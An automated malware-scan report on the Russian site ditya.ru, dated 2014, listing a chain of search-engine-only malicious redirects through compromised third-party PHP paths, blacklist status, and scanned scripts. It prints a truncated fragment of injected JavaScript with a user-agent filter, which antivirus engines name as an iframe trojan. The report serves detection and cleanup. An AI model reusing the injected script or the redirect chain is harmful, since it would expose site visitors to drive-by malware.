Malware Scanner report for ditya.ru

Malicious/Suspicious/Total URLs checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "ditya.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious redirects
Found
The website redirects visitors arriving from search engines to a 3rd-party URL. The chain of malicious redirects found:
->http://alfsystem.com.my/includes/domit/1.php
471 websites infected. alfsystem.com.my is marked by Yandex as suspicious.
->http://www.csra.de/includes/domit/1.php
346 websites infected.
->http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
56 websites infected.
->http://google.ru
42 websites infected.

The website "ditya.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ditya.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ditya.ru/

Result: The website is marked by Yandex as suspicious; visiting this web site may harm your computer.

Malicious/Suspicious Redirects

Request / Server response / Status
URL: http://ditya.ru/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: ditya.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Sat, 28 Jun 2014 10:27:12 GMT
Location: http://alfsystem.com.my/includes/domit/1.php
Server: nginx/1.2.1
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.13
malicious
URL: http://alfsystem.com.my/includes/domit/1.php
(imitation of visitor from search engine)


GET /includes/domit/1.php HTTP/1.1
Host: alfsystem.com.my
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 28 Jun 2014 10:27:13 GMT
Location: http://www.csra.de/includes/domit/1.php
Server: Apache
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.23
malicious
URL: http://www.csra.de/includes/domit/1.php
(imitation of visitor from search engine)


GET /includes/domit/1.php HTTP/1.1
Host: www.csra.de
Referer: http://www.google.com/search?q=redirect+check3
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 28 Jun 2014 10:27:13 GMT
Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
Server: Apache
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.4.29
malicious
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
(imitation of visitor from search engine)


GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1
Host: jbtconsultinggroup.com
Referer: http://www.google.com/search?q=redirect+check4
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 28 Jun 2014 10:27:13 GMT
Location: http://google.ru
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
malicious

Scanned pages/files

Request / Server response / Status
http://ditya.ru/
200 OK
Content-Length: 23998
Content-Type: text/html
clean
http://ditya.ru/cache/template/js.php?id=904548fe50f1a3bf5e2bdf2b6db55378
200 OK
Content-Length: 86241
Content-Type: application/x-javascript
clean
http://ditya.ru/cache/template/js.php?id=b5796c3d38edccdffd29d389a0d073d9
200 OK
Content-Length: 3638
Content-Type: application/x-javascript
clean
http://ditya.ru/cache/template/js.php?id=67f2ab8d2469f0de9d16b01dff68cd13
200 OK
Content-Length: 83992
Content-Type: application/x-javascript
clean
http://ditya.ru/cache/template/js.php?id=c9661bd88b851d91bb6b218452e811cb
200 OK
Content-Length: 825
Content-Type: application/x-javascript
clean
http://stg.odnoklassniki.ru/share/odkl_share.js
200 OK
Content-Length: 12312
Content-Type: application/x-javascript
clean
http://ditya.ru/cache/template/js.php?id=6fbdc23a99e66aded74ec900a7877dd6
200 OK
Content-Length: 8761
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function stripos(f_haystack,f_needle,f_offset){var haystack=(f_haystack+'').toLowerCase();var needle=(f_needle+'').toLowerCase();var index=0;if((index=haystack.indexOf(needle,f_offset))!==-1){return index;}
return false;}
function zzz_check_ua(){var blackList='Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0';blackList=blackList.split('|');va
... 7958 bytes are skipped ...
);$('div.headerbox div.deepest').matchHeight(20);$('div.topbox div.deepest').matchHeight(20);$('#bottom div.bottombox div.deepest').matchHeight(20);$('#bottom2 div.bottombox div.deepest').matchHeight(20);$('div.maintopbox div.deepest').matchHeight(20);$('div.mainbottombox div.deepest').matchHeight(20);$('div.contenttopbox div.deepest').matchHeight(20);$('div.contentbottombox div.deepest').matchHeight(20);$('#left, #right, #contentleft, #contentright').matchHeight(20);});;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast             JS:Iframe-DVI [Trj]
Microsoft         Trojan:JS/Iframe.DI
Kaspersky         HEUR:Trojan.Script.Generic
NANO-Antivirus    Trojan.Script.Iframe.brqwio
VIPRE             Trojan.JS.IFrame.di (v)
Norman            Iframe.ZX

http://ditya.ru/templates/yoo_neo/warp/js/search.js
200 OK
Content-Length: 5493
Content-Type: application/x-javascript
clean
https://apis.google.com/js/plusone.js
200 OK
Content-Length: 11840
Content-Type: application/javascript
clean
http://userapi.com/js/api/openapi.js?18
200 OK
Content-Length: 64039
Content-Type: application/x-javascript
clean
http://ditya.ru/index.php/component/users/?view=reset
200 OK
Content-Length: 18468
Content-Type: text/html
clean
http://ditya.ru/cache/template/js.php?id=ced0b8895e47deadec3d4bbc1f0d7d2e
200 OK
Content-Length: 224400
Content-Type: application/x-javascript
clean
http://ditya.ru/cache/template/js.php?id=e22d7081f45d883c89e55f0847946a79
200 OK
Content-Length: 2630
Content-Type: application/x-javascript
clean
http://ditya.ru/index.php/component/users/
200 OK
Content-Length: 17338
Content-Type: text/html
clean
http://ditya.ru/index.php/component/users/?view=remind
200 OK
Content-Length: 18187
Content-Type: text/html
clean